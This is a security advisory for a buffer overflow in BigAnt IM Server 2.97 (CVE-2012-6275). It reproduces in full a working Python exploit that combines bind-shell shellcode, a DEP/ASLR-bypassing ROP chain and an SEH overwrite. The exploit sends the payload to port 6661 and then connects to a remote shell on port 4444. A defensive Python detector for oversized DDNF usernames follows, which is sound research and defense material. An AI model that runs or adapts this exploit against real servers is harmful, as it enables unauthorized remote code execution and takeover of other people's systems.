BigAnt IM Server Buffer Overflow Vulnerability

Published: 2013-04-10
Updated: 2013-04-12
Affected systems:
bigantsoft BigAnt IM Server
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58998
CVE(CAN) ID: CVE-2012-6275

BigAnt IM Server is the messaging server used by the BigAnt Messenger enterprise instant-messaging platform.

BigAnt IM Server 2.97 performs no effective bounds check on user-supplied input, so its implementation contains a buffer overflow; an attacker can exploit it to execute arbitrary code in the context of the server.
 
<*Source: Craig Freyman (@cd1zz)
 *>
Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is provided solely for security research and teaching. Use it at your own risk!
```python
#!/usr/bin/python
#Title: BigAnt Server 2.97 DDNF Username Buffer Overflow
#Author: Craig Freyman (@cd1zz) http://pwnag3.com
#Tested on: Windows 7 64 bit (DEP/ASLR Bypass)
#Similar Exploits:
#http://www.exploit-db.com/exploits/24528/
#http://www.exploit-db.com/exploits/24527/
#http://www.exploit-db.com/exploits/22466/

import socket,os,struct,sys,subprocess,time

if len(sys.argv) < 2:
    print "[-]Usage: %s <target addr> " % sys.argv[0] + " "
    sys.exit(0)

host = sys.argv[1]

#msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -b "\x00\x0a\x0d\x20\x25\x27"
sc = (
"\xd9\xec\xba\x1f\xaf\x04\x2d\xd9\x74\x24\xf4\x5d\x2b\xc9"
"\xb1\x56\x31\x55\x18\x03\x55\x18\x83\xc5\x1b\x4d\xf1\xd1"
"\xcb\x18\xfa\x29\x0b\x7b\x72\xcc\x3a\xa9\xe0\x84\x6e\x7d"
"\x62\xc8\x82\xf6\x26\xf9\x11\x7a\xef\x0e\x92\x31\xc9\x21"
"\x23\xf4\xd5\xee\xe7\x96\xa9\xec\x3b\x79\x93\x3e\x4e\x78"
"\xd4\x23\xa0\x28\x8d\x28\x12\xdd\xba\x6d\xae\xdc\x6c\xfa"
"\x8e\xa6\x09\x3d\x7a\x1d\x13\x6e\xd2\x2a\x5b\x96\x59\x74"
"\x7c\xa7\x8e\x66\x40\xee\xbb\x5d\x32\xf1\x6d\xac\xbb\xc3"
"\x51\x63\x82\xeb\x5c\x7d\xc2\xcc\xbe\x08\x38\x2f\x43\x0b"
"\xfb\x4d\x9f\x9e\x1e\xf5\x54\x38\xfb\x07\xb9\xdf\x88\x04"
"\x76\xab\xd7\x08\x89\x78\x6c\x34\x02\x7f\xa3\xbc\x50\xa4"
"\x67\xe4\x03\xc5\x3e\x40\xe2\xfa\x21\x2c\x5b\x5f\x29\xdf"
"\x88\xd9\x70\x88\x7d\xd4\x8a\x48\xe9\x6f\xf8\x7a\xb6\xdb"
"\x96\x36\x3f\xc2\x61\x38\x6a\xb2\xfe\xc7\x94\xc3\xd7\x03"
"\xc0\x93\x4f\xa5\x68\x78\x90\x4a\xbd\x2f\xc0\xe4\x6d\x90"
"\xb0\x44\xdd\x78\xdb\x4a\x02\x98\xe4\x80\x35\x9e\x2a\xf0"
"\x16\x49\x4f\x06\x89\xd5\xc6\xe0\xc3\xf5\x8e\xbb\x7b\x34"
"\xf5\x73\x1c\x47\xdf\x2f\xb5\xdf\x57\x26\x01\xdf\x67\x6c"
"\x22\x4c\xcf\xe7\xb0\x9e\xd4\x16\xc7\x8a\x7c\x50\xf0\x5d"
"\xf6\x0c\xb3\xfc\x07\x05\x23\x9c\x9a\xc2\xb3\xeb\x86\x5c"
"\xe4\xbc\x79\x95\x60\x51\x23\x0f\x96\xa8\xb5\x68\x12\x77"
"\x06\x76\x9b\xfa\x32\x5c\x8b\xc2\xbb\xd8\xff\x9a\xed\xb6"
"\xa9\x5c\x44\x79\x03\x37\x3b\xd3\xc3\xce\x77\xe4\x95\xce"
"\x5d\x92\x79\x7e\x08\xe3\x86\x4f\xdc\xe3\xff\xad\x7c\x0b"
"\x2a\x76\x8c\x46\x76\xdf\x05\x0f\xe3\x5d\x48\xb0\xde\xa2"
"\x75\x33\xea\x5a\x82\x2b\x9f\x5f\xce\xeb\x4c\x12\x5f\x9e"
"\x72\x81\x60\x8b")

#rop chain generated with mona.py - www.corelan.be
rop_gadgets = ""
rop_gadgets += struct.pack("<L",0x0f9edaa9)  # POP EDX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0fa021cc)  # ptr to &VirtualProtect() [IAT expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9ea2a7)  # MOV ECX,DWORD PTR DS:[EDX] # SUB EAX,ECX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9e0214)  # PUSH ECX # SUB AL,5F # POP ESI # POP EBP # RETN 0x24 [expsrv.dll]
rop_gadgets += struct.pack("<L",0x41414141)  # Filler (compensate)
rop_gadgets += struct.pack("<L",0x0f9ee3d9)  # POP ECX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x41414141)  # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141)  # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141)  # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141)  # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141)  # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141)  # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141)  # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141)  # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141)  # Filler (compensate)
rop_gadgets += struct.pack("<L",0x0F9A5001)  # &Writable location
rop_gadgets += struct.pack("<L",0x0f9f1e7c)  # POP EDX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0xffffffff)  # EDX starting value
for i in range(0,65): rop_gadgets += struct.pack("<L",0x0f9dbb5a)  # INC EDX # RETN ghetto style [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9e65b6)  # POP EAX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0xfffffdff)  # Value to negate, will become 0x00000201
rop_gadgets += struct.pack("<L",0x0f9f2831)  # NEG EAX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9c5f4b)  # POP EDI # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0FA0C001)  # put this in edi so the next one doesn't die, writable for edi
rop_gadgets += struct.pack("<L",0x0f9e2be0)  # PUSH EAX # OR BYTE PTR DS:[EDI+5E],BL # POP EBX # POP EBP # RETN 0x08    ** [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9e24f9)  # push esp # ret 0x08 |  {PAGE_EXECUTE_READ} [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9c5f4b)  # POP EDI # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x41414141)  # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141)  # Filler (compensate)
rop_gadgets += struct.pack("<L",0x0f9e5cd2)  # RETN (ROP NOP) [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9c8a3e)  # POP EAX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x909006eb)  # nop with a ninja jump
rop_gadgets += struct.pack("<L",0x0f9f30c2)  # PUSHAD # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9e5cd2)  # RETN (ROP NOP) [expsrv.dll]

front = "A" * 684
seh = struct.pack("<L",0x0f9eeb8a)  # ADD ESP,1004 [expsrv.dll]
back = "C" * 1592
stack_adjust = "\x81\xc4\x24\xfa\xff\xff"
junk = "D" * (4000 - (len(front) + len(seh) + len(back) + len(rop_gadgets) + len(stack_adjust) + len(sc)))
sploit = front + seh + back + rop_gadgets + stack_adjust + sc + junk

print "[+] Sending pwnag3 to " + str(host)
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,6661))
    s.send(""
    "DDNF 17 "
    "classid: 100 "
    "cmdid: 1 "
    "objid: 1 "
    "rootid: 3 "
    "userid: 8 "
    "username: "+sploit+
    " ")
    time.sleep(1)
except:
    print "[-] There was a problem"
    sys.exit()

print "[+] Getting your shell. "
time.sleep(3)
subprocess.Popen("telnet "+host+" 4444",shell=True).wait()
print "[*] Done."
s.close()
```

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

bigantsoft
----------
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version:

http://www.bigantsoft.com/download.html
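The following Python 3 snippet is an added, defender-side example and is not part of the advisory or of the PoC author's code: it parses a request of the shape the PoC above sends to TCP port 6661 and flags a `username` value that is oversized, non-printable or padded, which is the pattern a network sensor or the server's own input validation should reject. The 256-byte limit, the CRLF/LF line handling and the sample packets are assumptions and constructed data.

```python
import re

# Assumed upper bound for a legitimate username (not a figure from the
# advisory); the PoC above sends roughly 4000 bytes in this field and
# places its SEH overwrite 684 bytes into it.
MAX_USERNAME_LEN = 256

def inspect_ddnf(raw, limit=MAX_USERNAME_LEN):
    """Inspect one BigAnt request captured from TCP port 6661.

    Returns None if the payload is not a DDNF request, otherwise a dict
    with the command line, the parsed 'key: value' headers and a list of
    findings (empty list == nothing suspicious). Assumptions: lines end
    in CRLF or LF, and 'username:' is the last header, so everything
    after it is treated as the username value."""
    text = raw.decode("latin-1") if isinstance(raw, (bytes, bytearray)) else raw
    text = text.lstrip("\r\n")
    if not text.startswith("DDNF"):
        return None
    head, sep, tail = text.partition("username:")
    lines = re.split(r"\r?\n", head)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    username = tail.strip("\r\n").strip(" ") if sep else ""
    headers["username"] = username
    findings = []
    if len(username) > limit:
        findings.append("username length %d exceeds %d" % (len(username), limit))
    if re.search(r"[^\x20-\x7e]", username):
        findings.append("username contains non-printable bytes")
    if len(username) >= 64 and len(set(username[:64])) == 1:
        findings.append("username opens with a 64-byte run of one character")
    return {"command": lines[0].strip(), "headers": headers, "findings": findings}

# Constructed sample traffic (not captured from a real server).
HEADER = (b"\r\nDDNF 17\r\nclassid: 100\r\ncmdid: 1\r\nobjid: 1\r\n"
          b"rootid: 3\r\nuserid: 8\r\n")
BENIGN = HEADER + b"username: alice\r\n\r\n"
HOSTILE = HEADER + b"username: " + b"A" * 684 + b"\xff\xff\xff\xff" + b"C" * 100 + b"\r\n"

if __name__ == "__main__":
    for name, packet in (("benign", BENIGN), ("hostile", HOSTILE)):
        print(name, inspect_ddnf(packet)["findings"])
```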